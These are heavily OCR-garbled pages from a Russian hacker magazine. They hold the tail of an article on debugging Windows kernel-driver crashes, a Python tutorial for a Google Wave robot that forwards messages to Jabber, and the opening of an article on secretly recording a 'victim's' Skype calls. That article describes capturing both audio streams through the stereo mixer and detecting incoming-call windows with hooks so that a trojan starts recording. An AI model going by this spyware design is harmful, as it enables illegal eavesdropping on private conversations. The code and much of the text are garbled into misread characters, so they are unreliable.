еір=8053ЬБее езр=ааЬ67аОВ еЬр=ааЬ67аЕ4 іор1=0 пѵ ир еі рі пг па ре пс 

сз=0003 зз=0010 сіз=0023 ез=0023 із=0030 дз=0000 

пі !НіКезеіИгііеСТаісЬ+0х?4 : 

ЗОБЗЬЕее 8а07 люѵ аІ,Ъуіе ріг [есіі] 

Незеіііпд сіе(аиіі зсоре 

ПРИЧИНА ВБСЮ'А — НУЛЕВОЙ УКАЗАТЕЛЬ В ДРАЙВЕРЕ 



еЕ 1 = 00010206 



{^То023: 00000000=?^ 



Почувствуйте разницу: 

* Без символов * С символами 

ЛВе 736 в пНКе ВидСЬескЕх+ОхІЭ Г 1 Ѳе 7 МѲ пііКеВидСНееКЁк+ОхІЭ 

ЛВе 7 Э 0 О гкіі ІорГС*ІЮгіѵег+Ох 18 ПѲеТЭВО пН]орГС*ІЮгіѵвг+ 0 * 1 В 

ЛВе 7 ВД 0 Г аз№аІ! Г аі 5 ІП 0 Іе Аіупс+ 0 х 7 4 ПВеТМО РЕяЬГ«!'Га* 5 іп 0 ІеАіупс+Ох 74 

ИВв 7 а 5 с РазКаІІРаіСаттопИсай+ОкЕВе ПВс 7 а 5 с РаіІГяУРаіСа ГгіГЯОП НеаЦ+ОкЯВс 

ТЧВв 7 аСй Ря>Е№ РаІРнгіНеасЯ-ОхІ 36 ПВеТасе Р*«№»ИРіІРіСіРіввсНОхі 36 

Л Ве 7 вгіс ПІ!І оргс ашгі ѵвгНЭкЗІ Л Ѳе 7 айе пі!|прК,ІЮгІ ѵяг* 0 хЭ 1 

ЛВеГЬОс ЗОМЁОЙѴ+йхбіеЬ Г 1 Ѳе 7 ісе 3 ОМЁО Р?Ѵ!С Еутігр : : ІгрКеаа+ 0 х 4 Ь 

Л Ве 7 ь 2 е піП оРа д еЙе агі+Ох 1 9 Л Вс 7 аГО Іа Р ГС аі Ю гіѵ сг+ОхЭ І 

ЛВе7Ь9с пИМі Оівр нісМР аи 11 * 0 х 27 В ЛВс 7 Ь 0 с пі!ЗорРадсРгсаЦІп[сггіаИ-ах 12 

п Ве 7 Ь ас пііМтАсс в кв Раиіы-ОиЁЬТ П ве^йіс пгіЮРадене агі+Вхі в 

ПВв 7 Ьее піІ.КГГгарОЕ^ОхЬВ Лве 7 Ь 9 с піІИІіО іі ряТсЫ= шім 0 х 270 

ЛВе 7 сс 4 тИСсНарРаІа+ОхеГ ЛВеТйес ліІМппАссе* 8 РаЫг+ 0 х 6 Ь 7 

ЛВе7сГО Р аэ^ГаіІРаІН ЕайѴаіитвР іГе-Щ хЗЯ ЛВеТЙес ЛІІ_КГГгя рО Е *0 хЬВ 

Л Вв 7 е?В Раз№аІ! РаШоипіѴоІи тк+- 0 х 1 17 ПВе 7 сс 4 пІ'СсМярОаІа^Охе? 

Л Ве7сРО Р мІГвиР аКв ■<] Ѵаіитв РіЗе+ВиЗВ 
Л Ѳе? е 7 Ѳ РааГГа^РаИМои пТѴоі ит е* 0 хі О 

ВиСКЕТ_Ю 0х35_5ОМЕОЯѴ+еісЬ 



ВиСКЕТ_Щ ; РОС 1_С0 Ріви Р ЛОМ.Рпо. 5УЭ 



ДЛЯ ПОЛНОЦЕННОЙ РАБОТЫ С ѴѴШОВб НЕОБХО- 
ДИМ ПАКЕТ СИМВОЛОВ 



шаііос ( зігео^ ( *рагат) ) ; 

шешзеі (рагат, 0, зІ 2 ео^(*рагаш)); 
ЕхІпіІііаІігеШогкІ^ет (&рагат->ікет / 
БеІауесіРипсІііоп, рагат) ; 

ЕхОиеиеШогкІкет (&рагат->ікеш / БеІауесіШгкОиеие) ; 



В данном коде, если текущий уровень ІВСІІ_ будет выше, чем РА55ІѴЕ 
І_ЕѴЕІ_, выполнение функции ОеІауебЕипсбоп будет отложено на 
более поздний срок = т.е., когда ядро «поймает» для этого подходя- 
щий уровень I РОІ Развернутый пример использования ѴѴогкІіетз 

для работы в ядре ищи на диске. 



ЗАКЛЮЧЕНИЕ 

Приведенные здесь советы должны помочь тебе в успешном 
дебаггинге. Еслиты всерьез увлекаешься разработкой драйверов 
уровня ядра, будь то системы защиты ил и же написание не совсем 
добропорядочных зверушек, хотя и редко, но на стадии тестиро- 
вания будут встречаться ситуации, которые смогут поставить тебя 
в тупик. Это связано с одной единственной причиной: в работу 
ядра успешно вмешиваются разработчики всяческих проактивных 
защит, файрволов и антивирей. Логика их действий практически 
всегда скрыта от посторонних глаз (ну правильно, кто же будет 
палить алгоритм своих действий — ведь его «непубличность» и 
является гарантией успешности]. Встраиваясь в эту систему, ты 
невольно ее нарушаешь, а ядро очень нервно реагирует на всякие 
попытки изменения существующего баланса. Как результат — ты 
будешь лицезреть В5СЮ практически на ровном месте. Например, 
это касается разработки всяческих сетевых фильтров — существу- 
ющие коммерческие файрволы, как правило, перехватывают си- 
стемные вызовы как на N015 уровне, так и уровне ЮІ -интерфейса. 
Однако, какова именно логика их перехвата — не всегда известно 
и значит заранее неизвестно, как будут вести себя твой драйвер и 
драйвер файрвола в одном стеке. Кпримеру, уменя была ситуа- 
ция, что драйвер приложения «Е5ЕТ Бтагі Зесигііу» ер^ѵѵЫі.зуз 
(фильтрующий ЮІ-трафик], вылетал с В500, когда мне приспичи- 
ло ковыряться с содержимым сетевого I ЕР- па кета. Как результат — 
малоинформативный В500 с кодом КЕРЫЕЕ_МОВЕ_ЕХСЕРТІОЫ_ 
І\ІОТ_НАЫВЕЕВ_М. 

В этой ситуации точно обозначить причину, послужившую причиной 
ВЭСЮ’а, с первого раза можно было лишь словами: «Она утонула». 
Если появились вопросы, пиши, обсудим. Удачного компилирования 
и да пребудет с тобой Сила! т 
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СОЭІЫС 



■ ■ РОМАН «РРЕ5ЮЕМТІІА» ХОМЕНКО НТТР://ТиТАМС.СОМ 

РОБОТ 
ДЛЯ 6006І.Е 

ИАѴЕ 

НАПИШЕМ 
ЕГО НА РУТНОИ’Е! 



«ЛАДНО, Я ПОСТРОЮ свой 
СОБСТВЕННЫЙ МОДУЛЬ 
С БЛЕК-ДЖЕКОМ И ШЛЮХАМИ. 
ВООБЩЕ-ТО, К ЧЕРТУ МОДУЛЬ И 
БЛЕК-ДЖЕК ... КАКИЕ ХОРОШИЕ 
СОВЕТЫ МОГУТ ДАВАТЬ РОБОТЫ! 
ОТЛИЧНО. СЕГОДНЯ Я РАССКАЖУ 
ТЕБЕ. КАК ПОСТРОИТЬ СВОЕГО 
МАЛЕНЬКОГО РОБОТА. НАПРИМЕР. 
ДЛЯ НОВОМОДНОГО СООВІ.Е ШУЕ. 




Бі§і1:а1 

ОрРісаІ 

Сашега 



Зепзогз 




Агш 







Зиррогі: 

РІаРРогт 
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б оодіе ѴѴаѵе получил хороший пиар, и думаю, в этом мире не 
сыскать того, кто не слышал о нем (не считая соседа Толика, 
который в запое :)). Нельзя исключить, что пиар даже 
немножко повредил Волне, позиционируя это явление при- 
роды как убийцу почты, форумов и чуть ли не всего осталь- 
ного интернета. Лично для меня Волна — это достаточно классно 
сделанный ІРСс хорошим АР І.Спомощью которого мы можем созда- 
вать гаджеты и, что интереснее, роботов, которые могут расширять 
возможности ѴѴаѵе под любые нужды. 



РОБОТ АРІ 

Робот для ѴѴаѵе будет представлять собой е-таіі с аватаркой, описа- 
нием и закрепленными за ним событиями. Событий у нас будет около 
1 5 штук, но для большинства случаев хватит и двух: 



ШАѴЕЬЕТ_8ЕЬР_АББЕБ 

ВБІР_8БВМІТТЕБ 



Первое событие возникает, когда мы добавляем робота на какую- 
либо волну. Второе событие проявляется в случае, когда кто-то 
добавляет сообщение, причем это сообщение возникает в момент 
нажатия на кнопку «Ропе». Вообще, в контексте программирования 
волны Соодіе вводит несколько понятий: 

- ѵѵаѵе — полностью весь ѴѴаѵе; 

- ѵѵаѵе Іеі — обозначает конкретную волну; 

- Ыір — одно сообщение. 

Помнишь в позапрошлом номере я тебе рассказывал о Соодіе Ар р 
Епдіпе(ОАЕ)? Так вот, на данный момент роботов можно строить лишь 
с использованием 6АЕ. 

К ПРАКТИКЕ! 

Теория в случаях с Гуглом сложнее, чем практика, поэтому не будем на 
ней задерживаться и перейдем сразу к созданию робота. Все проекты 
на САЕ начинаются с пустой папки и файла арр.уаті, в котором мы 
установим, что все запросы от ѵѵаѵе будет обрабатывать скрипт ібоЕру: 

Ьапсііегз : 

- игі : /_ѵѵаѵе/ . * 
зсгірБ : ііЪоБ.ру 

- игі : /аззеБз 
зБаБіс_с1іг: аззеБз 



Давай теперь определим ТТХ нашего робота. Пусть он должен уве- 
домлять нас по джабберу о новых сообщениях в Волну. И, соответ- 




ѴѴНѴАКЕѴОиМОТТКѴШбТОКіи-МЕВЕЫОЕК? 




ЕОІТІОН 



2009 



РКЕѴІЕѴѴ - 9 ВГА Щ 



СООО.Е Ѵ/ЛѴІ 

Ш ѵ/имо! 

г ГОК- 

симміЕз 



АРКЕМЕ А 
СОШМ/САКГЕ 
У СОІА В ОМ Я 
СОЫ ЛИГ 
АМ/СОІ ЕМ 
Г/ЕМРО ЯЕАІ, 



НАР РУ ѴУАѴІЫС! 
ІНѴІТАСІОН АІ 
ОООСІГ И /АѴЕ 
інсилро 



ілмлі і. 1 . і №КЭтЯ 



О ѴѴАѴЕ УЖЕ И КНИЖКИ ПОЯВИЛИСЬ 



ственно, мы должны иметь возможность подписывать свой джаббер 
на обновления и удаляться из рассылки. В тексте приходящего 
сообщения будет содержаться мейл автора и текст новой мессаги. 
Нам нужно будет перехватывать событие ѴѴАѴЕЕЕТ_5ЕЕЕ_А00Е0 
для вывода справки о командах и перехватывать ВиР_51ІВМІТТЕ0 с 
целью рассылки уведомлений. 

Начнем прогить файл робота ]ЬоЕру, поместив в начале импорт не- 
обходимых библиотек: 



ПАРОЧКА 



Работа над проектом ѴѴаѵе началась в 2007 году. Основными раз- 
работчиками программного обеспечения были братья Ларе и Йенс 
Расмуссены, также являющиеся главными разработчиками Соодіе 
Марз. 

Соодіе ѴѴаѵе использует технологии, предоставленные возмож- 
ностями НТМБ 5. Некоторые функции в настоящее время доступны 
только после установки Соодіе Сеагз. 

Технология Соодіе ѴѴаѵе подразумевает открытость протоколов 
и программного обеспечения (под лицензией АрасЬе Зоітѵѵаге 
Ьісепзе), что позволяет развертывать собственные серверы Соодіе 
ѴѴаѵе как подключенные и синхронизируемые, так и не подклю- 
ченные к серверам Соодіе. Во втором случае сообщения между 
пользователями локальной инсталляции не будут передаваться во 
внешнюю сеть. 

Название навеяно сериалом «Светлячок», в котором «волна» — это 
электронная коммуникация (часто с видео-звонком или видео- 
сообщением) . На презентации для разработчиков Соодіе І/О Ларе 
Расмуссен отвечал на некоторые фразы — «блестяще» (англ. зЫпу), 
то есть использовал слово, обычно применяемое в этом сериале 
в смысле «здорово». В качестве сообщения об отказе системы в 
Соодіе ѴѴаѵе использована популярная цитата из сериала — «Будь 
проклято ваше внезапное, но неизбежное предательство!». 
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СООІЫО 




> ІПІО 

Хорошо быть пер- 
вым? Да! Поэтому 
к моменту запу- 
ска ѴѴаѵе в паблик 
желательно уметь на- 
писать к нему крутой 
спамер или что-то 
в этом роде :). 




> СІѴСІ 

•Исходники бота со 
всеми либами ждут 
тебя на диске 

• Как всегда, снял для 
тебя видео про тести- 
рование своего бота. 
Надеюсь, заценишь! 




НТТР://ѴѴѴШ 

■ г 

> Ііпкз 

• Описание внутрен- 
него протокола ѴѴаѵе: 

ѵѵаѵергоіосоі.огд . 

• Сам Соодіе ѴѴаѵе: 
ЫТрз:/Ал/аѵе.доод[е. 
сот . 

• ѴѴаѵе АРІ на рус- 
ском: 

ЬирѴ/сосІе.доодІе. 

сот/іпЦ/ги-РЦ/аріз/ 

ууауе. 




КСТАТИ, В 2010-М НАМ ОБЕЩАЮТ НОВЫЕ 
СЕРИИ РІІТІІВАМА! 




АТАК ѴѴАѴЕ ВЫГЛЯДИТ ДЛЯ ЮЗЕРОВ 



ѵ^аѵеіб = сопДехД . СеДКооШаѵеіеД ( ) . СеШаѵеІб ( ) 

Затем обработаем событие добавления робота на волну. 
При получении данного события мы добавим текстовое 
сообщение в волну с описанием команд, которые наш 
бот сможет принимать: 



ігот члаѵеарі ітрогД еѵепбз 
ігот маѵеарі ітрогД гоЪоД 



беі аббВІір (сопДехД , збгіпд) : 

сопДехД . СеДКооШаѵеіеД ( ) . СгеаДеВіір ( ) . \ 
СеДБосшпепД ( ) . ЗеДТехД ( збгіпд) 



Создадим объект робота, передав название, адрес ава- 
тарки, версию и адрес сайта робота. Заметь, что версию 
нужно обязательно менять, если изменяется список со- 
бытий, потому что новые события в этом случае не будут 
работать. 

шуКоЪоД = гоЪоД . КоЪоР ( 1 м-таіігоЪоД ' , 

ішаде_иг1= ' ЪЩДр : //ѵ^-таіІгоЬоД . аррзроД . сот/ 
ітадез/аѵабаг . рпд ' , 
ѵегзіоп= ' 1 ' , 

ргоРі1е_иг1= ' іШДр : / /ѵ7-таіігоЪоД . аррзроД . 
сот/ * ) 

Теперь добавим перехват нужных событий и сам запуск 
робота: 



беі ОпКоЬоСАббеб (ргорегбіез , сопДехД) : 
аббвіір (сопДехД , " I 'ш аііѵе ! \п 
Сошшапб: \п 

маЪЪег-ЪоД аббте: з аЬЬег@з аЬЬег . з а\п 
маЪЪег-ЪоД гетоѵе те : з аЬЬег@з аЬЬег . за" ) 

Здесь для будущего удобства мы добавили функцию по 
добавлению сообщений — асИВІір.А потом уже отправи- 
ли само сообщение. 

ДЖАББЕР 

Сейчас нам стобой придется научиться отсылать из САЕ 
сообщения на джаббер. Для этого активируем соответствую- 
щий функционал путем добавления в файл настроекарр.уаті 
нескольких строчек: 



туКоЪоД . КедізДегНапбІег ( еѵепбз . Ѵ^АѴЕЬЕТ_ЗЕЬР_ 
АББЕБ, ОпКоЬоДАббеб) 

шуКоЬоД . КедізДегНапбІег ( еѵепбз . ВЫР_ 
ЗІІВМІТТЕБ , ОпВІірЗиЬшіЦДеб) 
туКоЪоД . Кип ( ) 

В процессе регистрации перехватчиков мы указывали 
ОпВоЬоіАббеб, ОпВІірЗиЬтіиеб — это названия функ- 
ций, которые будут вызываться при активизации собы- 
тия. Они должны принимать два параметра: ргорегбез, 
сопіехК 

В ргорегбез будет содержаться информация относи- 
тельно конкретного события, а в сопіехі: — информация 
об окружении, о волне, где событие возникло. Именно 
через работу с сопіехі: мы можем добавить новое 
сообщение в волну, вызвав такую длинную цепочку 
функций : 

сопДехД . СеДКооШаѵеіеД ( ) . СгеаДеВіір ( ) . 



іпЬоипб_зегѵісез : 

- хтрр_теззаде 

Вуаля, теперь мы можем юзать функции для отправки 
запроса авторизации и самих сообщений: 

ігот доодіе . аррепдіпе . арі . хтрр \ 
ітрогД зепб_теззаде , зепсЩіпѵібе 
#просьба авторизации 
зепсЩіпѵібе ( "кому" ) 

#отослать сообщение 

зДаДиз = зепб_теззаде ( " кому " , «текст сообще- 
ния» ) 

В процессе программирования под боодіе ѴѴаѵе иногда 
не очень понятно, почему что-то не работает. Исходя 
из этого, нам обязательно нужно использовать модуль 
Іоддіпд. В ОАЕ после его импортирования мы можем до- 
бавлять сообщения разной степени важности: 



ОеДБосшпепД ( ) . ЗеДТехД (зДгіпд) 

Также из нее можно достать идентификатор волны, кото- 
рый нам позже понадобится: 



Іоддіпд . іпДо ( 1 іпДо 1 ) 

Іоддіпд . еггог ( 1 еггог * ) 

Обработчик этих сообщений автоматически добавит 
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информацию о них в базу данных. И мы, зайдя в админку, сможем их 
просматривать. 

БЫЛ ВНР? 

Для завершения работы осталось сделать последний шаг— напи- 
сать ОпВІірБиЬтіиесІ — обработчик события о новом сообщении. 
Функция эта будет способна обрабатывать три ситуации: 

• была команда «добавить джабер в лист оповещения»; 

• была команда «удалить джабер с листа оповещения»; 

• не было команды, тогда — разослать это сообщения по подпис- 
чикам. 

Алгоритм ясен? Выразим его скупыми строчками программного 
кода: 

йеб ОпВіірЗиЪтіббесІ (ргорегбіез , сопбехб) і 

Ыір = сопбехб . СебВіірВуІсІ (ргорегбіез [ 'Ыірісі' ] ) 
бехб_Ыір = Ыір . СебБоситепб ( ) . СебТехбО 

іб бехб_Ыір . збагбзЫбЬ. ( ЫаЪЪег-Ъоб асісі ше: * ) : 
#добавить юзера 
гебигп 

іб бехб_Ыір . збагбзЫбЬ. ( ЫаЪЪег-Ъоб гешоѵе те : 1 ) : 
#удалить юзера 
гебигп 

#разослать всем сообщение 

БАЗА ДАННЫХ 

Для сохранения привязки джаббер-акка к волне нам будет нужна 
база с двумя полями, одним для идентификатора волны и вторым для 
джаббера: 

бгот доодіе . аррепдіпе . ехб ітрогб 6Ь 
сіазз ШаѵеМобеІ (бЬ.Мобеі) : 
маѵе = сІЬ. ЗбгіпдРгорегбу ( ) 
изег = сПэ . ЗбгіпдРгорегбу ( ) 

Все готово к непосредственной обработке команд и добавлению 
пользователей в БД: 



ЕЩЕ ПАРОЧКА 



Допустим, мы получили сообщение: 

Ыір = сопбехб . СебВіірВуІсІ (ргорегбіез [ 1 Ыіріб 1 ] ) 

Добавить текст в какую-то позицию: 

Ыір . СебБосшпепб ( ) . ІпзегбТехб (роз , бехб) 

Добавить текст в конец сообщения: 

Ыір . СебБосшпепб () . АррепсІТехб (ТЕКСТ) 

Удалить можно командой: 

Ыір . Беіебе ( ) 

Создать ссылку: 

бос = маѵеіеб . СгеабеВіір ( ) . СебБосшпепб ( ) 
бос . ЗебАппобабіоп (Аппобабіоп (Капде ( 0 , 5 ) , 

" ііпк/шапиаі " , "кббр : / /хакер . ги " ) ) 
бос . ЗебТехб ( "ХАКЕР" ) 




ОБОБЩЕННАЯ СХЕМАѴѴАѴЕ 



іі бехб_Ыір . збагбзЫбЪ. ( ЫаЪЪег-Ъоб абб те : 1 ) : 
сгеабог = бехб_Ыір [ 18 : ] . збгір ( ) 

соипб = ШаѵеМобеі . аіі ( ) . біібег ( 1 ѵ^аѵе = 1 , маѵеіб) . \ 
біібег ( ’ изег = 1 , сгеабог ) . соипб ( ) 
іб соипб : 
гебигп 

ШаѵеМобеі ( 

маѵе = ѵ^аѵеіб, 
изег = сгеабог 
) • риб ( ) 

зепб_іпѵібе (сгеабог) 

аббвіір (сопбехб , "%зілаз аббеб" %сгеабог ) 
гебигп 

Как видим, мы не только добавляем юзера в базу данных, ноиприсы- 
лаем запрос авторизации — чтобы остальные сообщения доставля- 
лись без затруднений. Принцип удаления пользователя из рассылки 
практически аналогичен, а точнее — намного проще. Ознакомься с 
тремя главными строчками: 

г ет, = ШѵеМобеІ . аіі ( ) . біібег ( 1 маѵе = 1 , маѵеіб) . 
біібег ( 1 изег = 1 , сгеабог) 
бог і іп гег : 
і . беіебе ( ) 

Если же никакой команды нет, то достаем из базы всех, кто подпи- 
сался, и отправляем им сообщение: 

аіі_и = ШѵеМобеі . аіі (). біібег ( Ыаѵе = маѵеіб) 
бог и іп аіі_и : 

збабиз = зепб_теззаде (и. изег, 

"Ыем тез заде бгот %з : \п%з " % (Ыір_сгеабог , бехб_Ыір) ) 

Видишь, как просто? Мы так долго готовились к реализации работы 
с командами, а на деле получилось лишь несколько строчек сухого и 
безжалостного программного кода. 

ЛЮДИ ИЛИ БЕНДЕР? 

После написания робота я залил его на ОАЕ, и теперь ты можешь до- 
бавить ѵѵаЬЬег-гобоШаррзробсот ксебе в контакты. По идее, нужно 
еще добавить подтверждения для джабера, чтобы только пользо- 
ватель мог себя добавить в список. А то ведь получается, что любой 
джаббер -аккаунт можно будетзаспамить...хотя, наверное, это не баг, 
афича. В общем, до новых встреч! Ну, Фрай, было приятно познако- 
миться, пойду, убью себя ©. т 
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ССЮІЫб 



■ ■ и л ѳ к бмщю в в в е р т ъештад я гвк внмшыпгоімм в і. е к . к іі 




прослушка 



СКАЙП. БЕССПОРНО. РУЛИТ. ЕСЛИ РАНЬШЕ НАМ НУЖНО БЫЛО ЧАСАМИ 
ОТВИСАТЬ В ТЕКСТОВЫХ ЧАТАХ. НАБИВАЯ КИЛОБАЙТЫ ИНФОРМАЦИИ. 



ТО ТЕПЕРЬ. БЛАГОДАРЯ РАСПРОСТРАНЕНИЮ БЕЗЛИМИТН0Г0 ИНЕТА 
ВПЛОТЬ ДО РОССИЙСКОЙ ГЛУБИНКИ. ДАЖЕ САМЫЕ УДАЛЕННЫЕ ОТ 



СТОЛИЦЫ ИНТЕРНЕТЧИКИ МОГУТ ПОЗНАТЬ РАДОСТЬ ГОЛОСОВОГО 



ОБЩЕНИЯ. 
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акера же все это голосовое общение может только рас- 
строить. Ведьтеперь гениальные кеуіод’еры, которые 
он научился мастерить из подручных инструментов, 
начинают нервно курить в сторонке. Общение голосом 
хуками не перехватишь! Что же делать? Смириться и 
уходить на заслуженную ][-пенсию? Ни в коем случае! Я провел 
все необходимые исследования по захвату скайп-переговоров 
(редактор рубрики обещал поставить смертельную инъекцию, 
если я их не за кончу] и прямо сейчас готов поделиться их ре- 
зультатами. І_еі’5 до! 

СПОСОБЫ ПЕРЕХВАТА 

С целью мы определились и теперь нужно начитаться скучной теории, 
без которой в таком деле продвинуться нереально. Прогуляйся поулице, 
свари себе чашечку глинтвейна, расположисьудобнее в кресле и на- 
чинай впитывать священные знания. 

СПОСОБ #1 

Буквально в начале октября 2009 года один умелец написал продвинутый 
снифер, о котором написали во всехзесигііу-ресурсах всемирной паути- 
ны. Если верить новостям и автору снифа, то выходит, что перцуудалось 
перехватить скайп-трафик (ну, это можно было сделать и раньше] и, что 
самое главное — расшифроватьего. 

Обойти такое событие стороной я не мог, поэтому немедленно решил 
найти заветный исходничек (автор снифера был чертовски добр и вы- 
ложил на паблик полный сорец), ножестко обломался. Враги народа 
убрали заветный сорецс сабжевого сайта, а часовой марш-бросокпо 
гуглу нормальных результатов не дал. Мне лишь попадались какие-то 
нерабочие сорцы. 

Совсем отчаявшись, я плюнул на этот вариант. Стоп! Если ничего не вы- 
шло, то зачем я все это тебе рассказываю? Все просто, ситуация меняется 
каждый день и вполне возможно, что к моменту выхода статьи в свет на 
просторах всемирной паутины появятся рабочие сорцы этого тройчи- 
ка. Чем черт не шутит. Учти, если удастся найти заветный исходник, то 
считай, чтоутебя в руках все козыри и теперь все скайперы станут для 
тебя мишенями. 

СПОСОБ #2 

Несомненно, первый способ — самый лучший, но с реализацией реаль- 
ный напряг. Буду откровенен: я уже отчаялся и хотел положить на всю за- 
тею железный болт, но редактор рубрики был другого мнения. После пары 
намеков, двухударов по почкам и печени я не смоготказать в подготовке 
материала. Как оказалось, сделал я это не зря. 

Если не получается достичь цели напрямую, то нужно заходить с тылу. Так 
поступил и ваш покорный слуга. Идея проста до безобразия и, возможно, 
ты уже даже юзал эту фичу для какого-нибудь благого дела. 

Не буду ходить вокруг да около, а раскрою все карты. Итак, в горячо мной 
любимых операционных системах от МісгозоіЧ есть та кая фича — стерео- 
микшер. Немногие знают, что благодаря этой, казалось бы, бесполезной 
приблуде и какого-нибудь языка программирования реально сварганить 
полноценного зкуре- шпиона. 

Активируй в своей (или не совсем своей?) системе стерео-микшер, итебе 
становятся подвластными оба звуковых потока — тот, которой идет на 
микрофон и соответственно тот, который поступает на колонки/наушники. 
Догадываешься, кчемуя клоню? Все верно, чтобы зарипать беседу двух 
людей по скайпу, тебе лишь потребуется воспользоваться стандартным 
ѴѴіпАРІ/объектами для записи звука с микрофона. 

Сделать это достаточно просто и убедиться в этом ты сможешь, взглянув 
на врезку 1 . В ней я привел часть кода, отвечающего за записьзвука. Не 
торопись все это переписывать, сразу он утебя все равно нескомпилится. 
Увы, несмотря на всю мощь и безграничные возможности ,І\ІЕТ 
Егатеѵѵогк, в нем совершенно отсутствуют инструменты для записи 
звука. Несомненно, в будущих версиях этот пробел будет восполнен, но 
м ы -то ждать нем оже м ! 

Многие .ІЧЕТ-разработчики для организации в своих приложениях 
возможности записи звука используют банальные вызовы АРІ-функций. 



Вариант неплохой, но крайне неудобный. Я пошел несколько другим 
путем и воспользовался наработками Магк НеаІіНі . 

Этот человек потрудился на славу и создал проект N АисІ іо — аудиоредак- 
тор с открытым исходным кодом. В рамках проекта Марк написал каркас, 
позволяющий максимально удобно взаимодействовать с различными 
ѴѴіпАРІ-функциями для работы со звуком. 

ЫАи б іо доступен на нашем БѴБ. Просто подтяни его модули ксвоему про- 
екту и тебе станут доступны все необходимые классы. Записывать звук с 
их помощью крайне просто. Даты, наверное, в этом уже убедился :). 

В самом начале листинга я определяю форматѴѴАѴ-файла. Для этого мне 
требуется установить количество каналов (в нашем случае будем писать в 
топо] и частоту сэмпла. Кроме настроекформата аудиофайла, мнетребуется 
определитьустройство (беѵісе питЬег], с которого мы будем захватывать звук. 
Я устанавливаю 0, что соответствуетустройству записи «по умолчанию». 
Узнавать об очередной порции поступивших на звуковую карту данных 
нам может событие ѵѵаѵеІп_Ва1:аАѵаіЫ.е(). Если оно сработало, то значит 
пришли данные и ихтребуется записать. 

А ВОТ И ПЕРВЫЕ МИНУСЫ 

Не спеши пускать слюни и пытаться впопыхах сотворить зловреда для 
Зкуре. Предложенный мной способ хорош и полностью работоспособен, 
но у него есть несколько минусов, о которыхтебе необходимо узнать за- 
ранее. Некоторые из них: 

1. Нет никаких гарантий, что в системе пользователя стерео-микшер 
вообще будет активен. Да, он включен по умолчанию, но многие поль- 
зователи принудительно отключают его. Зачем? Лично мне приходится 
это делать из-за того, что я пишу подкасты и мне крайне важно, чтобы 
звук захватывался лишь с моего микрофона, а не голоса соведущего. 
Твоя программа должна быть готова ктакому положению дел и в случае 
чего суметь самостоятельно внести нужные настройки. Вот здесь воз- 
никают небольшие сложности, но разве кто-то говорил, что будет совсем 
просто? 

2 . Нет четкого ориентира, на который можно опереться и 100% заве- 
рить, что именно сейчас пользователь начал общаться со своим собе- 
седником. На одном из кодерских форумов для решения данной тра- 
блы предлагали следующий способ: анализировать звук, поступающий 
на микрофон и в случае обнаружения больших скачков звуковой волны 
(т.е. когда человек начинает орать/говорить) приступать к записи. Для 
прерывания следует руководствоваться примерно таким алгоритмом 

— ждем тишины и, если она длится более п минут, прекращаем захват 
звука. 

Предложенный алгоритм, несомненно, хорош, но в описанном выше 
виде им лучше не пользоваться. Попробую объяснить, почему. Заюзав 
данный способ в чистом виде, ты рискуешь напороться на большое коли- 

I 
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> ѵѵагпіпд 

Подслушивание 
чужих разговоров — 
глубоко незаконная 
вещь. Используй 
полученную инфор- 
мациютолько для 
создания бэкапера 
своих разговоров! 



> СІѴСІ 

Все используемые в 
статье инструменты 
(библиотеки, классы, 
БйК] ты найдешь на 
нашем 0Ѵ0. 
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ТЬеІІЬег0ѵегІ_0гсІ Сгеаііопв 
5куре4СОМ Еѵепі: Напсііег Ехатріе 



Нате: ЗкурИСОМ Еѵепі; Напсііег Ехатріе 

Ѵегеіоп: ІАЗМ2 

РиЫбНег: ТііеиЬегОѵеііоій Сгеаьол! 

ТЯе йэіоюлд ргегедиМ» зге гедигегі: 

* ѵдпгісѵмІпяэІегЭл 

* .НЕТ Ргэтеѵѵогк 3.5 $РІ 

ІГ нЬеіе сотропепіз ага аігеасіу пйаіесі,, уои сап ЬигссЬ йш арркаЦоп гшѵ, 1 . Осііеглве, скк 
Ш& ЬиПоп ЬеЬгс со іп5Са1 Фе ргееди&е$ элсі гсш №е аррГнзйоп. 



СгеаЯсга. ОяЕеліег &одкк! " СЬ^Опсе агкі ІСГ Ргзпч№дгк Птацгок 




СКбег Ехатріе^ Оспе Іп Шегпеі ЕхрІогег: 






1_1$ег5 Ехатріе ОТМР Ехатріе СНаЬ Нійогу Ехатріе СаІІ Ні&Ьэгу Ехатріе 
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ИНСТАЛЛИРУЕМ 5РК В ОДИН КЛИК 



(52%) Установка 5куре4С0М Еѵепі Напсііег Ехатріе 



Установка 5куре4С0М Еѵепі Напсііег Ехатріе 

Это может занять несколько минут. Компьютер во время установки можно 
использовать для выполнения других задач. 




Из: 



5кѵре4СОМ Еѵепі Напсііег Ехатріе 
5куре.$аѵеопІеІерЬопеЬіІІ5.сот 




Загрузка: 1, И МВ из 2, 15 МВ 



[І2Ійёа"ЗІ 



УСТАНОВКА БИБЛИОТЕКИ ВЗАИМОДЕЙСТВИЯ 
СОСКАЙПОМ 



чество ложных срабатываний. Если на вражеской террито- 
рии микрофон лежит возле колонок, из которых без устали 
звучит Ьеаѵу теіаі, то твой трой будет постоянно вести 
запись, и во время сбора урожая ты обнаружишь, чтоутебя 
появился сборник всех любимых треков твоей жертвы. Что 
же тогда делать? Надеяться на авось и писать все подряд? 
Можно, но это как-то не по-хакцерски. 

Я провел небольшой мозговой штурм и пришел к выводу, 
что озвученным выше способом пользоваться можно, но 
только предварительно организовав страховку. Страховка 
можетбыть, какминимум, двух видов: 

1. ХУКИ. В нашем журнале мы неоднократно описывали тех- 
нику применения хуков, и еще раз расписывать все под- 
робности и, тем более, приводить примеры, меня сильно 
обламывает. Ты уже не маленький и такие вещи должен 
знать :). Я лишь подскажу алгоритм: 

A. Ставим хук на обработку создания новых окон. 

B. Реализуем проверку, в которой обрабатываем каждое 
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СКАЙП ТРЕБУЕТ РАЗРЕШЕНИЯ НАЗАПУСК 



вновь созданное окно. В коде проверки мы должны смотреть на: роди- 
теля окна, класс окна, заголовок и т.д. По этим признакам мы можем 
распознать окно входящего 5куре-звонка и в случае чего начать запись. 
2. ФУНКЦИИ ДЛЯ РАБОТЫ С ОКНАМИ. Вторым вариантом решения задачи 
будут хорошо знакомые тебе ѴѴіпАРІ-функции для работы с окнами. 

Ты ведь еще помнишь такие слова, как РіпсІѴѴіпсІоѵѵ, ЕпитѴѴіпсІоѵѵз, 
ЕпитСЫІсІѴѴіпсІоѵѵз и т.д.? С помощью этих АРІ реализовывается 
банальный поиск окна входящего звонка. Если окно найдено, то это 
означает, что жертва начала базарить по скайпу, в противном случае 
нужно выполнить поиск чуть попозже. Периодичность поиска должна 
